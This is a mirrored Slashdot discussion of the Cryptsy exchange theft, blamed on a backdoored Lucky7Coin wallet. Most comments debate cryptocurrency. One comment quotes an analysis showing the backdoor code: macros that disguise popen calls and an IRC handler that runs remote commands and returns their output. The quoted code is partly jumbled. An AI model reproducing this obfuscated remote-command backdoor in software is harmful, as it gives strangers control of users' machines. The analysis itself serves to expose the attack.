Slashdot Mirror
Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet (softpedia.com)
An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.
Crypto currencies are like the wild wild west of monetary transactions. Unless you are doing something that requires absolute discretion, it's really not worth the risk.
(voice of Nelson)
This issue is a bit more complicated than you think.
"Coins" will never be a legit currency.
Just another reason not to use shitcoin. Even if it wasn't an inside job they pulled themselves, nobody else will get their money back.
Must be a slow news day...
not to mention my keyboard
Well, as the current Litecoin value is around $3, I dont think you can exactly blame that for dropping it from $9.50... Especially as this was 6 months ago.
The $9.50 spike that lasted a couple of days was highly unusual, and even then the $9.50 value was only ever sellers wet dreams, $8 was more like, and the spike lasted days, and never got down to $2. Any more BS we want to throw into the summary?
This is going to happen over and over and over and over and over. It'll be a looooooooong time, if ever, before virtual currencies are protected in any meaningful way against this sort of thing.
Look at it this way: there are maybe a half-dozen people running a something-coin exchange, but there are essentially a limitless number of bad guys out there who, from the safety of their basements, can spend all the time in the world thinking up ways to crack your system. Sooner or later one of them s going to do it, and *boom*, away go the something-coins. And that's assuming that the something-coin exchange guys aren't themselves in on it or playing along. Or "go bad" later. Or get extorted, or find themselves in a jam and need some money ASAP. The attack surface is, in a word, enormous.
Yes, real banks get robbed, but that takes some real time and effort and most of the time the robbers get caught. In contrast, the risk-to-reward ratio for virtual currency is so unbalanced that it's a natural target with minimal risks. No bullets flying around, no get-away cars, no bank guards, no logistics about hauling the cash away, no dye-packets to worry about. It's like a crime made in heaven.
I don't have the answers (if there really are any) but you don't have to be a rocket scientist to see the problems inherent in virtual currencies. All of the people who lost money in this will, in all likelihood, never get a dime back. And worse yet, even the people who didn't lose money directly still take a hit when the currency undergoes devaluation because of the robbery. It seems like there are a LOT of risks and not many rewards.
I find the idea of virtual currencies interesting, but not mature or safe enough to put "real" money into any of them. Maybe someday, but not today...
Just cruising through this digital world at 33 1/3 rpm...
Blames Backdoor In the Code of a Wallet
Or maybe it was bad security.
Don't waste your vote! Vote for whoever you want, unless you live in a swing state it won't matter anyways
I'm more shocked to learn that Litecoin went as up as $9.50.
To report on the status of holdings, and material changes therein.
They hid this for 1.5yr, and that is likely to have resulted in criminal liability since they surely must have continued to take deposits.
Mt. Whatever! Live by the rotting bit, die by the lost coin!
Yours,
Major Boobage
A wallet is a non-executable data file.
You can't get a trojan from on.
Unless you're retarded and use a third party service or program to MANAGE wallets.
https://github.com/alerj78/luc...
dooglus commented on Mar 8, 2015
There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.
In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:
#define S_ORDER(a,b,c,d) b##a##d##c
* OS-dependent memory page locking/unlocking.
* Defined as policy class to make stubbing for test possible.
*/
#define CLine S_ORDER(I,F,E,L)
* Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
* std::allocator templates.
*/
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os)
#define CBuff "PR" "IV" "M" "SG"
Then in irc.cpp they are used to implement the backdoor:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1) :%s\r", CBuff, pszName, result.c_str()).c_str());
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s
}
}
I expect this is a known issue since this kind of thing doesn't happen accidentally.
Anons need not reply. Questions end with a question mark.
Meanwhile.... 2.39% of my "realcoin" disappeared on Wall Street today...
Unless you mean someone accessed your account and transferred out 2.39% of your fiat then no, you analogy is wrong. Price fluctuation != Coins/Fiat leaving your account. With price fluctuation nothing is lost unless you sell. Without a sale that down 2.39% is trivia, just like the up 2.xx% the day before.
And that's why "Coins" will never be a legit currency.
That's bad news for crypto anarchists but irrelevant to bitcoin users. Bitcoins remain a convenient transfer mechanism, fast, low fee, guaranteed.
Fiat currency A --> bitcoins --> transfer from user 1 to user 2 --> Fiat currency B.
I'm more shocked to learn that Litecoin went as up as $9.50.
For a minute. What it actually plateaued at for some number of days was $4.50'ish, pre block halving speculation possibly, before it sort of stabilized around $3.00 give or take. Which is what it needed to do, double from $1.50'ish to $3.00'ish, in the block halving so that miners would not lose money, leave, and cause the coin to collapse and fail. Have to give users/speculators enough credit to adjust the price to keep the miners afloat, many currencies can't even manage to do that.
Fiat currency A --> bitcoins --> wallet --> backdoor --> El Chapo
It little behooves the best of us to comment on the rest of us.
By your logic .. drug dealers use physical cash so therfore cash must only be used by drug dealers and drug users. Any crime involving cash should be ignored as it is just criminals robbing criminals.
Way more crimes are committed involving paper money. It's also much more difficult to track.
This bitcoin drug argument is so old and misinformed.
If you took 10 minutes to actually explore what bitcoin was instead of making judgements based off of pour second hand information maybe you would understand the novelty bitcoin introduces.
Maybe Bitcon fails as a currency. It does not matter really. Distributed consensus is not going away and that is what bitcoin gives us.
It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.
'The tyrant will always find pretext for his tyranny.' - Aesop's Fables
Bitcoin is primarily for illegal activity right now.
fast, low fee, guaranteed.
Because what I want is to have to pay someone else to use my "money".
Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
We will bankrupt ourselves in the vain search for absolute security. -- Dwight D. Eisenhower
Ok, but you are paying for the debt card and credit card transactions. All stores take them and they are charged a processing fee, as such they raise the prices of there items. If you are using cash you are paying for everyone else to use there debit card.
You just don't see the cost when you check out.
Floriculture, the raising of flowers for sale, is a $100 billion a year business. That includes tulips. Just because tulips were overpriced once upon a time, or dotcom stocks or real estate more recently, does not mean they have no value.
> Oddly, when I hand over a $10 bill, a real piece of money, it doesn't cost me a cent to make my transaction and it's untraceable as to who used it.
Actually, you pay for that piece of paper over time, because the Treasury Department has to keep printing new ones to replace the ones that wear out, and printing and distributing cash costs money. It's buried in your federal taxes. Also, paper money isn't untraceable. Large bills go through readers that record the serial numbers, and can link that to who deposited or withdrew it. So if you got your $10 at a cash machine, and the person who you gave it to put it back in another bank, they can figure out who made a transaction with who. Generally they don't bother to track $10 transactions, but pull out or deposit thousands in cash, and you can bet they track it.
Bitcoin was designed as electronic cash, it says so on the original white paper. It was designed to overcome the locality limitations of paper money. Try sending $10 in cash from the US to Indonesia in under an hour. With the Bitcoin Network you can do that. With Western Union, not so much.
That exact calculation was done by the Silk Road prosecutors, so we know that 4% of bitcoin transactions were for drugs during the time that marketplace was operating. Whereas for the world economy in general, illegal drugs account for 3% of GDP. It's not an entirely different picture, it's the same picture.
A $10 bill hasn't been money since it was unlinked from the gold standard, it's still currency.
More etc... https://www.youtube.com/watch?v=iFDe5kUUyT0